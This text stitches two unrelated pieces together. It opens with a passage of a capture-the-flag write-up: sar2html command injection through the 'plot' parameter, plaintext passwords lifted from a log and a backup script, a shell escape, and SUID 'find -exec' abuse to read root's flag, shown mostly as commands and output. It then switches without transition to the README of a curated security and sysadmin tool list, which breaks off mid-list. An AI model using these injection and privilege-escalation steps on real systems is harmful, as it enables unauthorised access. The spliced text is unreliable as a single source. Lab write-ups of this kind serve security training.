which decodes to `Time command spring` (https://quipqiup.com/). Nothing interesting.
#### sar2html
sar2html
http://10.10.127.30/joomla/_test/
Looking for information on `sar2html` on Google, I found this: https://packetstormsecurity.com/files/153858/Sar2HTML-3.2.1-Remote-Command-Execution.html:
~~~
# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7
In web application you will see index.php?plot url extension.
http://<ipaddr>/index.php?plot=;<command-here> will execute
the command you entered. After command injection press "select # host" then your command's
output will appear bottom side of the scroll screen.
~~~
!["sar2html exploit"](files/sar2html-exploit.png)
Command `;ls -l`
~~~
total 116
-rwxr-xr-x 1 www-data www-data 53430 Aug 22 2019 index.php
-rwxr-xr-x 1 www-data www-data 716 Aug 21 2019 log.txt
-rwxr-xr-x 1 www-data www-data 53165 Mar 19 2019 sar2html
drwxr-xr-x 3 www-data www-data 4096 Aug 22 2019 sarFILE
~~~
Command `;cat log.txt`
~~~
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: superduperp@$$
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.
~~~
Let's try to connect over ssh (running on port `55007`) with:
* username: `basterd`
* password: `superduperp@$$`
It works, we now have a ssh access.
Answer: `log.txt`
## [Task 1] Questions #1
You can complete this with manual enumeration, but do it as you wish
## #1 - Where was the other users pass stored(no extension, just the name)?
We are now connected over SSH with a customized shell. Let's escape it:
~~~
$ /bin/bash
basterd@Vulnerable:/home$
~~~
`basterd` is not in the sudoers:
~~~
basterd@Vulnerable:/usr/local$ sudo -l
[sudo] password for basterd:
Sorry, user basterd may not run sudo on Vulnerable.
~~~
~~~
basterd@Vulnerable:/home$ ls -l
total 8
drwxr-x--- 3 basterd basterd 4096 Aug 22 2019 basterd
drwxr-x--- 3 stoner stoner 4096 Aug 22 2019 stoner
basterd@Vulnerable:/home$ cd stoner/
bash: cd: stoner/: Permission denied
basterd@Vulnerable:/home$ cd basterd/
basterd@Vulnerable:~$ ls -ila
total 16
146309 drwxr-x--- 3 basterd basterd 4096 Aug 22 2019 .
130050 drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
278584 -rwxr-xr-x 1 stoner basterd 699 Aug 21 2019 backup.sh
151978 -rw------- 1 basterd basterd 0 Aug 22 2019 .bash_history
130915 drwx------ 2 basterd basterd 4096 Aug 22 2019 .cache
~~~
~~~
basterd@Vulnerable:~$ cat backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log
DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows
ssh $USER@$REMOTE mkdir $TARGET/$DATE
if [ -d "$SOURCE" ]; then
for i in `ls $SOURCE | grep 'data'`;do
echo "Begining copy of" $i >> $LOG
scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
echo $i "completed" >> $LOG
if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
rm $SOURCE/$i
echo $i "removed" >> $LOG
echo "####################" >> $LOG
else
echo "Copy not complete" >> $LOG
exit 0
fi
done
else
echo "Directory is not present" >> $LOG
exit 0
fi
~~~
The backup script discloses the password for the `stoner` user:
* username: `stoner`
* password: `superduperp@$$no1knows`
Answer: `backup`
## #2 - user.txt
Now we can login as `stoner`:
~~~
basterd@Vulnerable:/usr/local$ su - stoner
Password:
stoner@Vulnerable:~$ whoami
stoner
stoner@Vulnerable:~$ cd
stoner@Vulnerable:~$ ls -ila
total 16
130093 drwxr-x--- 3 stoner stoner 4096 Aug 22 2019 .
130050 drwxr-xr-x 4 root root 4096 Aug 22 2019 ..
151986 drwxrwxr-x 2 stoner stoner 4096 Aug 22 2019 .nano
279807 -rw-r--r-- 1 stoner stoner 34 Aug 21 2019 .secret
stoner@Vulnerable:~$ cat .secret
You made it till here, well done.
~~~
Answer: `You made it till here, well done.`
## #3 - What did you exploit to get the privileged user?
Let's list our privileges:
~~~
stoner@Vulnerable:/home$ sudo -l
User stoner may run the following commands on Vulnerable:
(root) NOPASSWD: /NotThisTime/MessinWithYa
~~~
OK, wrong track. Let's see what executables are owned by root and have the SUID bit set:
~~~
$ find / -user root -perm -4000 -executable -type f 2>/dev/null
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap
~~~
Oh oh... `find` is on the list. This command allows to execute actions, let's exploit this.
Answer: `find`
## #4 - root.txt
~~~
stoner@Vulnerable:/$ find /root -exec ls /root \;
root.txt
root.txt
stoner@Vulnerable:/$ find /root -exec cat /root/root.txt \;
It wasn't that hard, was it?
It wasn't that hard, was it?
~~~
Answer: `It wasn't that hard, was it?` |
<p align="center">
<a href="https://github.com/trimstray/the-book-of-secret-knowledge">
<img src="https://github.com/trimstray/the-book-of-secret-knowledge/blob/master/static/img/the-book-of-secret-knowledge-preview.png" alt="Master">
</a>
</p>
<p align="center">"<i>Knowledge is powerful, be careful how you use it!</i>"</p>
<h4 align="center">A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools, and more.</h4>
<br>
<p align="center">
<a href="https://github.com/trimstray/the-book-of-secret-knowledge/pulls">
<img src="https://img.shields.io/badge/PRs-welcome-brightgreen.svg?longCache=true" alt="Pull Requests">
</a>
<a href="LICENSE.md">
<img src="https://img.shields.io/badge/License-MIT-lightgrey.svg?longCache=true" alt="MIT License">
</a>
</p>
<p align="center">
<a href="https://twitter.com/trimstray" target="_blank">
<img src="https://img.shields.io/twitter/follow/trimstray.svg?logo=twitter">
</a>
</p>
<div align="center">
<sub>Created by
<a href="https://twitter.com/trimstray">trimstray</a> and
<a href="https://github.com/trimstray/the-book-of-secret-knowledge/graphs/contributors">contributors</a>
</div>
<br>
****
## :notebook_with_decorative_cover: What is it?
This repository is a collection of various materials and tools that I use every day in my work. It contains a lot of useful information gathered in one piece. It is an invaluable source of knowledge for me that I often look back on.
## :restroom: For whom?
For everyone, really. Here everyone can find their favourite tastes. But to be perfectly honest, it is aimed towards System and Network administrators, DevOps, Pentesters, and Security Researchers.
## :information_source: Contributing
If you find something which doesn't make sense, or something doesn't seem right, please make a pull request and please add valid and well-reasoned explanations about your changes or comments.
A few simple rules for this project:
- inviting and clear
- not tiring
- useful
These below rules may be better:
- easy to contribute to (Markdown + HTML ...)
- easy to find (simple TOC, maybe it's worth extending them?)
Url marked **\*** is temporary unavailable. Please don't delete it without confirming that it has permanently expired.
Before adding a pull request, please see the **[contributing guidelines](.github/CONTRIBUTING.md)**. You should also remember about this:
```diff
+ This repository is not meant to contain everything but only good quality stuff.
```
All **suggestions/PR** are welcome!
### Code Contributors
This project exists thanks to all the people who contribute.
<a href="https://github.com/trimstray/the-book-of-secret-knowledge/graphs/contributors"><img src="https://opencollective.com/the-book-of-secret-knowledge/contributors.svg?width=890&button=false"></a>
### Financial Contributors
<p align="left">
<a href="https://opencollective.com/the-book-of-secret-knowledge" alt="Financial Contributors on Open Collective">
<img src="https://img.shields.io/opencollective/backers/the-book-of-secret-knowledge?style=for-the-badge&color=FF4500&labelColor=A9A9A9"></a>
</a>
<a href="https://opencollective.com/the-book-of-secret-knowledge" alt="Financial Contributors on Open Collective">
<img src="https://img.shields.io/opencollective/sponsors/the-book-of-secret-knowledge?style=for-the-badge&color=FF4500&labelColor=A9A9A9"></a>
</a>
</p>
#### Individuals
Become a financial contributor and help us sustain our community **[» contribute](https://opencollective.com/the-book-of-secret-knowledge/contribute)**.
#### Organizations
Support this project with your organization. Your logo will show up here with a link to your website **[» contribute](https://opencollective.com/the-book-of-secret-knowledge/contribute)**.
## :gift_heart: Support
If this project is useful and important for you or if you really like _the-book-of-secret-knowledge_, you can bring **positive energy** by giving some **good words** or **supporting this project**. Thank you!
## :newspaper: RSS Feed & Updates
GitHub exposes an [RSS/Atom](https://github.com/trimstray/the-book-of-secret-knowledge/commits.atom) feed of the commits, which may also be useful if you want to be kept informed about all changes.
## :ballot_box_with_check: ToDo
- [ ] Add new stuff...
- [ ] Add useful shell functions
- [ ] Add one-liners for collection tools (eg. CLI Tools)
- [ ] Sort order in lists
New items are also added on a regular basis.
## :anger: Table of Contents
Only main chapters:
- **[CLI Tools](#cli-tools-toc)**
- **[GUI Tools](#gui-tools-toc)**
- **[Web Tools](#web-tools-toc)**
- **[Systems/Services](#systemsservices-toc)**
- **[Networks](#networks-toc)**
- **[Containers/Orchestration](#containersorchestration-toc)**
- **[Manuals/Howtos/Tutorials](#manualshowtostutorials-toc)**
- **[Inspiring Lists](#inspiring-lists-toc)**
- **[Blogs/Podcasts/Videos](#blogspodcastsvideos-toc)**
- **[Hacking/Penetration Testing](#hackingpenetration-testing-toc)**
- **[Your daily knowledge and news](#your-daily-knowledge-and-news-toc)**
- **[Other Cheat Sheets](#other-cheat-sheets-toc)**
- **[One-liners](#one-liners-toc)**
- **[Shell functions](#shell-functions-toc)**
## :trident: The Book of Secret Knowledge (Chapters)
#### CLI Tools [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Shells
<p>
:small_orange_diamond: <a href="https://www.gnu.org/software/bash/"><b>GNU Bash</b></a> - is an sh-compatible shell that incorporates useful features from the Korn shell and C shell.<br>
:small_orange_diamond: <a href="https://www.zsh.org/"><b>Zsh</b></a> - is a shell designed for interactive use, although it is also a powerful scripting language.<br>
:small_orange_diamond: <a href="https://tcl-lang.org/"><b>tclsh</b></a> - is a very powerful cross-platform shell, suitable for a huge range of uses.<br>
:small_orange_diamond: <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a> - is a framework for using, developing and maintaining shell scripts and custom commands.<br>
:small_orange_diamond: <a href="https://ohmyz.sh/"><b>Oh My ZSH!</b></a> - is the best framework for managing your Zsh configuration.<br>
:small_orange_diamond: <a href="https://github.com/oh-my-fish/oh-my-fish"><b>Oh My Fish</b></a> - the Fishshell framework.<br>
:small_orange_diamond: <a href="https://github.com/starship/starship"><b>Starship</b></a> - the cross-shell prompt written in Rust.<br>
:small_orange_diamond: <a href="https://github.com/romkatv/powerlevel10k"><b>powerlevel10k</b></a> - is a fast reimplementation of Powerlevel9k ZSH theme.<br>
</p>
##### :black_small_square: Shell plugins
<p>
:small_orange_diamond: <a href="https://github.com/rupa/z"><b>z</b></a> - tracks the folder you use the most and allow you to jump, without having to type the whole path.<br>
:small_orange_diamond: <a href="https://github.com/junegunn/fzf"><b>fzf</b></a> - is a general-purpose command-line fuzzy finder.<br>
:small_orange_diamond: <a href="https://github.com/zsh-users/zsh-autosuggestions"><b>zsh-autosuggestions</b></a> - Fish-like autosuggestions for Zsh.<br>
:small_orange_diamond: <a href="https://github.com/zsh-users/zsh-syntax-highlighting"><b>zsh-syntax-highlighting</b></a> - Fish shell like syntax highlighting for Zsh.<br>
</p>
##### :black_small_square: Managers
<p>
:small_orange_diamond: <a href="https://midnight-commander.org/"><b>Midnight Commander</b></a> - is a visual file manager, licensed under GNU General Public License.<br>
:small_orange_diamond: <a href="https://github.com/ranger/ranger"><b>ranger</b></a> - is a VIM-inspired filemanager for the console.<br>
:small_orange_diamond: <a href="https://github.com/jarun/nnn"><b>nnn</b></a> - is a tiny, lightning fast, feature-packed file manager.<br>
:small_orange_diamond: <a href="https://www.gnu.org/software/screen/"><b>screen</b></a> - is a full-screen window manager that multiplexes a physical terminal.<br>
:small_orange_diamond: <a href="https://github.com/tmux/tmux/wiki"><b>tmux</b></a> - is a terminal multiplexer, lets you switch easily between several programs in one terminal.<br>
:small_orange_diamond: <a href="https://github.com/peikk0/tmux-cssh"><b>tmux-cssh</b></a> - is a tool to set comfortable and easy to use functionality, clustering and synchronizing tmux-sessions.<br>
</p>
##### :black_small_square: Text editors
<p>
:small_orange_diamond: <a href="http://ex-vi.sourceforge.net/"><b>vi</b></a> - is one of the most common text editors on Unix.<br>
:small_orange_diamond: <a href="https://www.vim.org/"><b>vim</b></a> - is a highly configurable text editor.<br>
:small_orange_diamond: <a href="https://www.gnu.org/software/emacs/"><b>emacs</b></a> - is an extensible, customizable, free/libre text editor - and more.<br>
:small_orange_diamond: <a href="https://github.com/zyedidia/micro"><b>micro</b></a> - is a modern and intuitive terminal-based text editor.<br>
:small_orange_diamond: <a href="https://neovim.io/"><b>neovim</b></a> - is a free open source, powerful, extensible and usable code editor.<br>
:small_orange_diamond: <a href="https://www.spacemacs.org/"><b>spacemacs</b></a> - a community-driven Emacs distribution.<br>
</p>
##### :black_small_square: Files and directories
<p>
:small_orange_diamond: <a href="https://github.com/sharkdp/fd"><b>fd</b></a> - is a simple, fast and user-friendly alternative to find.<br>
:small_orange_diamond: <a href="https://dev.yorhel.nl/ncdu"><b>ncdu</b></a> - is an easy to use, fast disk usage analyzer.<br>
</p>
##### :black_small_square: Network
<p>
:small_orange_diamond: <a href="https://www.putty.org/"><b>PuTTY</b></a> - is an SSH and telnet client, developed originally by Simon Tatham.<br>
:small_orange_diamond: <a href="https://mosh.org/"><b>Mosh</b></a> - is a SSH wrapper designed to keep a SSH session alive over a volatile connection.<br>
:small_orange_diamond: <a href="https://eternalterminal.dev/"><b>Eternal Terminal</b></a> - enables mouse-scrolling and tmux commands inside the SSH session.<br>
:small_orange_diamond: <a href="https://nmap.org/"><b>nmap</b></a> - is a free and open source (license) utility for network discovery and security auditing.<br>
:small_orange_diamond: <a href="https://github.com/zmap/zmap"><b>zmap</b></a> - is a fast single packet network scanner designed for Internet-wide network surveys.<br>
:small_orange_diamond: <a href="https://github.com/robertdavidgraham/masscan"><b>masscan</b></a> - is the fastest Internet port scanner, spews SYN packets asynchronously.<br>
:small_orange_diamond: <a href="https://github.com/gvb84/pbscan"><b>pbscan</b></a> - is a faster and more efficient stateless SYN scanner and banner grabber.<br>
:small_orange_diamond: <a href="http://www.hping.org/"><b>hping</b></a> - is a command-line oriented TCP/IP packet assembler/analyzer.<br>
:small_orange_diamond: <a href="https://github.com/traviscross/mtr"><b>mtr</b></a> - is a tool that combines the functionality of the 'traceroute' and 'ping' programs in a single network diagnostic tool.<br>
:small_orange_diamond: <a href="https://github.com/mehrdadrad/mylg"><b>mylg</b></a> - is an open source utility which combines the functions of the different network probes in one diagnostic tool.<br>
:small_orange_diamond: <a href="http://netcat.sourceforge.net/"><b>netcat</b></a> - is a networking utility which reads and writes data across network connections, using the TCP/IP protocol.<br>
:small_orange_diamond: <a href="https://www.tcpdump.org/"><b>tcpdump</b></a> - is a powerful command-line packet analyzer.<br>
:small_orange_diamond: <a href="https://www.wireshark.org/docs/man-pages/tshark.html"><b>tshark</b></a> - is a tool that allows us to dump and analyze network traffic (wireshark cli).<br>
:small_orange_diamond: <a href="https://termshark.io/"><b>Termshark</b></a> - is a simple terminal user-interface for tshark.<br>
:small_orange_diamond: <a href="https://github.com/jpr5/ngrep"><b>ngrep</b></a> - is like GNU grep applied to the network layer.<br>
:small_orange_diamond: <a href="http://netsniff-ng.org/"><b>netsniff-ng</b></a> - is a Swiss army knife for your daily Linux network plumbing if you will.<br>
:small_orange_diamond: <a href="https://github.com/mechpen/sockdump"><b>sockdump</b></a> - dump unix domain socket traffic.<br>
:small_orange_diamond: <a href="https://github.com/google/stenographer"><b>stenographer</b></a> - is a packet capture solution which aims to quickly spool all packets to disk.<br>
:small_orange_diamond: <a href="https://github.com/sachaos/tcpterm"><b>tcpterm</b></a> - visualize packets in TUI.<br>
:small_orange_diamond: <a href="https://github.com/tgraf/bmon"><b>bmon</b></a> - is a monitoring and debugging tool to capture networking related statistics and prepare them visually.<br>
:small_orange_diamond: <a href="http://iptraf.seul.org/2.6/manual.html#installation"><b>iptraf-ng</b></a> - is a console-based network monitoring program for Linux that displays information about IP traffic.<br>
:small_orange_diamond: <a href="https://github.com/vergoh/vnstat"><b>vnstat</b></a> - is a network traffic monitor for Linux and BSD.<br>
:small_orange_diamond: <a href="https://iperf.fr/"><b>iPerf3</b></a> - is a tool for active measurements of the maximum achievable bandwidth on IP networks.<br>
:small_orange_diamond: <a href="https://github.com/Microsoft/Ethr"><b>ethr</b></a> - is a Network Performance Measurement Tool for TCP, UDP & HTTP.<br>
:small_orange_diamond: <a href="https://github.com/jwbensley/Etherate"><b>Etherate</b></a> - is a Linux CLI based Ethernet and MPLS traffic testing tool.<br>
:small_orange_diamond: <a href="https://github.com/mpolden/echoip"><b>echoip</b></a> - is a IP address lookup service.<br>
:small_orange_diamond: <a href="https://github.com/troglobit/nemesis"><b>Nemesis</b></a> - packet manipulation CLI tool; craft and inject packets of several protocols.<br>
:small_orange_diamond: <a href="https://github.com/packetfu/packetfu"><b>packetfu</b></a> - a mid-level packet manipulation library for Ruby.<br>
:small_orange_diamond: <a href="https://scapy.net/"><b>Scapy</b></a> - packet manipulation library; forge, send, decode, capture packets of a wide number of protocols.<br>
:small_orange_diamond: <a href="https://github.com/SecureAuthCorp/impacket"><b>impacket</b></a> - is a collection of Python classes for working with network protocols.<br>
:small_orange_diamond: <a href="https://github.com/arthepsy/ssh-audit"><b>ssh-audit</b></a> - is a tool for SSH server auditing.<br>
:small_orange_diamond: <a href="https://aria2.github.io/"><b>aria2</b></a> - is a lightweight multi-protocol & multi-source command-line download utility.<br>
:small_orange_diamond: <a href="https://github.com/x-way/iptables-tracer"><b>iptables-tracer</b></a> - observe the path of packets through the iptables chains.<br>
:small_orange_diamond: <a href="https://github.com/proabiral/inception"><b>inception</b></a> - a highly configurable tool to check for whatever you like against any number of hosts.<br>
</p>
##### :black_small_square: Network (DNS)
<p>
:small_orange_diamond: <a href="https://github.com/farrokhi/dnsdiag"><b>dnsdiag</b></a> - is a DNS diagnostics and performance measurement tools.<br>
:small_orange_diamond: <a href="https://github.com/mschwager/fierce"><b>fierce</b></a> - is a DNS reconnaissance tool for locating non-contiguous IP space.<br>
:small_orange_diamond: <a href="https://github.com/subfinder/subfinder"><b>subfinder</b></a> - is a subdomain discovery tool that discovers valid subdomains for websites.<br>
:small_orange_diamond: <a href="https://github.com/aboul3la/Sublist3r"><b>sublist3r</b></a> - is a fast subdomains enumeration tool for penetration testers.<br>
:small_orange_diamond: <a href="https://github.com/OWASP/Amass"><b>amass</b></a> - is tool that obtains subdomain names by scraping data sources, crawling web archives and more.<br>
:small_orange_diamond: <a href="https://github.com/google/namebench"><b>namebench</b></a> - provides personalized DNS server recommendations based on your browsing history.<br>
:small_orange_diamond: <a href="https://github.com/blechschmidt/massdns"><b>massdns</b></a> - is a high-performance DNS stub resolver for bulk lookups and reconnaissance.<br>
:small_orange_diamond: <a href="https://github.com/guelfoweb/knock"><b>knock</b></a> - is a tool to enumerate subdomains on a target domain through a wordlist.<br>
:small_orange_diamond: <a href="https://github.com/DNS-OARC/dnsperf"><b>dnsperf</b></a> - DNS performance testing tools.<br>
:small_orange_diamond: <a href="https://github.com/jedisct1/dnscrypt-proxy"><b>dnscrypt-proxy 2</b></a> - a flexible DNS proxy, with support for encrypted DNS protocols.<br>
:small_orange_diamond: <a href="https://github.com/dnsdb/dnsdbq"><b>dnsdbq</b></a> - API client providing access to passive DNS database systems (pDNS at Farsight Security, CIRCL pDNS).<br>
:small_orange_diamond: <a href="https://github.com/looterz/grimd"><b>grimd</b></a> - fast dns proxy, built to black-hole internet advertisements and malware servers.<br>
</p>
##### :black_small_square: Network (HTTP)
<p>
:small_orange_diamond: <a href="https://curl.haxx.se/"><b>Curl</b></a> - is a command line tool and library for transferring data with URLs.<br>
:small_orange_diamond: <a href="https://gitlab.com/davidjpeacock/kurly"><b>kurly</b></a> - is an alternative to the widely popular curl program, written in Golang.<br>
:small_orange_diamond: <a href="https://github.com/jakubroztocil/httpie"><b>HTTPie</b></a> - is an user-friendly HTTP client.<br>
:small_orange_diamond: <a href="https://github.com/asciimoo/wuzz"><b>wuzz</b></a> - is an interactive cli tool for HTTP inspection.<br>
:small_orange_diamond: <a href="https://github.com/summerwind/h2spec"><b>h2spec</b></a> - is a conformance testing tool for HTTP/2 implementation.<br>
:small_orange_diamond: <a href="https://github.com/gildasio/h2t"><b>h2t</b></a> - is a simple tool to help sysadmins to hardening their websites.<br>
:small_orange_diamond: <a href="https://github.com/trimstray/htrace.sh"><b>htrace.sh</b></a> - is a simple Swiss Army knife for http/https troubleshooting and profiling.<br>
:small_orange_diamond: <a href="https://github.com/reorx/httpstat"><b>httpstat</b></a> - is a tool that visualizes curl statistics in a way of beauty and clarity.<br>
:small_orange_diamond: <a href="https://github.com/gchaincl/httplab"><b>httplab</b></a> - is an interactive web server.<br>
:small_orange_diamond: <a href="https://lynx.browser.org/"><b>Lynx</b></a> - is a text browser for the World Wide Web.<br>
:small_orange_diamond: <a href="https://github.com/dhamaniasad/HeadlessBrowsers"><b>HeadlessBrowsers</b></a> - a list of (almost) all headless web browsers in existence.<br>
:small_orange_diamond: <a href="https://httpd.apache.org/docs/2.4/programs/ab.html"><b>ab</b></a> - is a single-threaded command line tool for measuring the performance of HTTP web servers.<br>
:small_orange_diamond: <a href="https://www.joedog.org/siege-home/"><b>siege</b></a> - is an http load testing and benchmarking utility.<br>
:small_orange_diamond: <a href="https://github.com/wg/wrk"><b>wrk</b></a> - is a modern HTTP benchmarking tool capable of generating significant load.<br>
:small_orange_diamond: <a href="https://github.com/giltene/wrk2"><b>wrk2</b></a> - is a constant throughput, correct latency recording variant of wrk.<br>
:small_orange_diamond: <a href="https://github.com/tsenart/vegeta"><b>vegeta</b></a> - is a constant throughput, correct latency recording variant of wrk.<br>
:small_orange_diamond: <a href="https://github.com/codesenberg/bombardier"><b>bombardier</b></a> - is a fast cross-platform HTTP benchmarking tool written in Go.<br>
:small_orange_diamond: <a href="https://github.com/cmpxchg16/gobench"><b>gobench</b></a> - http/https load testing and benchmarking tool.<br>
:small_orange_diamond: <a href="https://github.com/rakyll/hey"><b>hey</b></a> - HTTP load generator, ApacheBench (ab) replacement, formerly known as rakyll/boom.<br>
:small_orange_diamond: <a href="https://github.com/tarekziade/boom"><b>boom</b></a> - is a script you can use to quickly smoke-test your web app deployment.<br>
:small_orange_diamond: <a href="https://github.com/shekyan/slowhttptest"><b>SlowHTTPTest</b></a> - is a tool that simulates some Application Layer Denial of Service attacks by prolonging HTTP.<br>
:small_orange_diamond: <a href="https://github.com/OJ/gobuster"><b>gobuster</b></a> - is a free and open source directory/file & DNS busting tool written in Go.<br>
:small_orange_diamond: <a href="https://github.com/ssllabs/ssllabs-scan"><b>ssllabs-scan</b></a> - command-line reference-implementation client for SSL Labs APIs.<br>
:small_orange_diamond: <a href="https://github.com/mozilla/http-observatory"><b>http-observatory</b></a> - Mozilla HTTP Observatory cli version.<br>
</p>
##### :black_small_square: SSL
<p>
:small_orange_diamond: <a href="https://www.openssl.org/"><b>openssl</b></a> - is a robust, commercial-grade, and full-featured toolkit for the TLS and SSL protocols.<br>
:small_orange_diamond: <a href="https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html"><b>gnutls-cli</b></a> - client program to set up a TLS connection to some other computer.<br>
:small_orange_diamond: <a href="https://github.com/nabla-c0d3/sslyze"><b>sslyze
</b></a> - fast and powerful SSL/TLS server scanning library.<br>
:small_orange_diamond: <a href="https://github.com/rbsec/sslscan"><b>sslscan</b></a> - tests SSL/TLS enabled services to discover supported cipher suites.<br>
:small_orange_diamond: <a href="https://github.com/drwetter/testssl.sh"><b>testssl.sh</b></a> - testing TLS/SSL encryption anywhere on any port.<br>
:small_orange_diamond: <a href="https://github.com/mozilla/cipherscan"><b>cipherscan</b></a> - a very simple way to find out which SSL ciphersuites are supported by a target.<br>
:small_orange_diamond: <a href="http://www.tarsnap.com/spiped.html"><b>spiped</b></a> - is a utility for creating symmetrically encrypted and authenticated pipes between socket addresses.<br>
:small_orange_diamond: <a href="https://github.com/certbot/certbot"><b>Certbot</b></a> - is EFF's tool to obtain certs from Let's Encrypt and (optionally) auto-enable HTTPS on your server.<br>
:small_orange_diamond: <a href="https://github.com/FiloSottile/mkcert"><b>mkcert</b></a> - simple zero-config tool to make locally trusted development certificates with any names you'd like.<br>
:small_orange_diamond: <a href="https://github.com/square/certstrap"><b>certstrap</b></a> - tools to bootstrap CAs, certificate requests, and signed certificates.<br>
:small_orange_diamond: <a href="https://github.com/yassineaboukir/sublert"><b>Sublert</b></a> - is a security and reconnaissance tool to automatically monitor new subdomains.<br>
:small_orange_diamond: <a href="https://github.com/trimstray/mkchain"><b>mkchain</b></a> - open source tool to help you build a valid SSL certificate chain.<br>
</p>
##### :black_small_square: Security
<p>
:small_orange_diamond: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/ch-selinux"><b>SELinux</b></a> - provides a flexible Mandatory Access Control (MAC) system built into the Linux kernel.<br>
:small_orange_diamond: <a href="https://wiki.ubuntu.com/AppArmor"><b>AppArmor</b></a> - proactively protects the operating system and applications from external or internal threats.<br>
:small_orange_diamond: <a href="https://github.com/grapheneX/grapheneX"><b>grapheneX</b></a> - Automated System Hardening Framework.<br>
:small_orange_diamond: <a href="https://github.com/dev-sec/"><b>DevSec Hardening Framework</b></a> - Security + DevOps: Automatic Server Hardening.<br>
</p>
##### :black_small_square: Auditing Tools
<p>
:small_orange_diamond: <a href="https://www.ossec.net/"><b>ossec</b></a> - actively monitoring all aspects of system activity with file integrity monitoring.<br>
:small_orange_diamond: <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"><b>auditd</b></a> - provides a way to track security-relevant information on your system.<br>
:small_orange_diamond: <a href="https://www.nongnu.org/tiger/"><b>Tiger</b></a> - is a security tool that can be use both as a security audit and intrusion detection system.<br>
:small_orange_diamond: <a href="https://cisofy.com/lynis/"><b>Lynis</b></a> - battle-tested security tool for systems running Linux, macOS, or Unix-based operating system.<br>
:small_orange_diamond: <a href="https://github.com/rebootuser/LinEnum"><b>LinEnum</b></a> - scripted Local Linux Enumeration & Privilege Escalation Checks.<br>
:small_orange_diamond: <a href="https://github.com/installation/rkhunter"><b>Rkhunter</b></a> - scanner tool for Linux systems that scans backdoors, rootkits and local exploits on your systems.<br>
:small_orange_diamond: <a href="https://github.com/hasherezade/pe-sieve"><b>PE-sieve</b></a> - is a light-weight tool that helps to detect malware running on the system.<br>
</p>
##### :black_small_square: System Diagnostics/Debuggers
<p>
:small_orange_diamond: <a href="https://github.com/strace/strace"><b>strace</b></a> - diagnostic, debugging and instructional userspace utility for Linux.<br>
:small_orange_diamond: <a href="http://dtrace.org/blogs/about/"><b>DTrace</b></a> - is a performance analysis and troubleshooting tool.<br>
:small_orange_diamond: <a href="https://en.wikipedia.org/wiki/Ltrace"><b>ltrace</b></a> - is a library call tracer, used to trace calls made by programs to library functions.<br>
:small_orange_diamond: <a href="https://github.com/brainsmoke/ptrace-burrito"><b>ptrace-burrito</b></a> - is a friendly wrapper around ptrace.<br>
:small_orange_diamond: <a href="https://github.com/brendangregg/perf-tools"><b>perf-tools</b></a> - performance analysis tools based on Linux perf_events (aka perf) and ftrace.<br>
:small_orange_diamond: <a href="https://github.com/iovisor/bpftrace"><b>bpftrace</b></a> - high-level tracing language for Linux eBPF.<br>
:small_orange_diamond: <a href="https://github.com/draios/sysdig"><b>sysdig</b></a> - system exploration and troubleshooting tool with first class support for containers.<br>
:small_orange_diamond: <a href="http://www.valgrind.org/"><b>Valgrind</b></a> - is an instrumentation framework for building dynamic analysis tools.<br>
:small_orange_diamond: <a href="https://github.com/gperftools/gperftools"><b>gperftools</b></a> - high-performance multi-threaded malloc() implementation, plus some performance analysis tools.<br>
:small_orange_diamond: <a href="https://nicolargo.github.io/glances/"><b>glances</b></a> - cross-platform system monitoring tool written in Python.<br>
:small_orange_diamond: <a href="https://github.com/hishamhm/htop"><b>htop</b></a> - interactive text-mode process viewer for Unix systems. It aims to be a better 'top'.<br>
:small_orange_diamond: <a href="https://github.com/aristocratos/bashtop"><b>bashtop</b></a> - Linux resource monitor written in pure Bash.<br>
:small_orange_diamond: <a href="http://nmon.sourceforge.net/pmwiki.php"><b>nmon</b></a> - a single executable for performance monitoring and data analysis.<br>
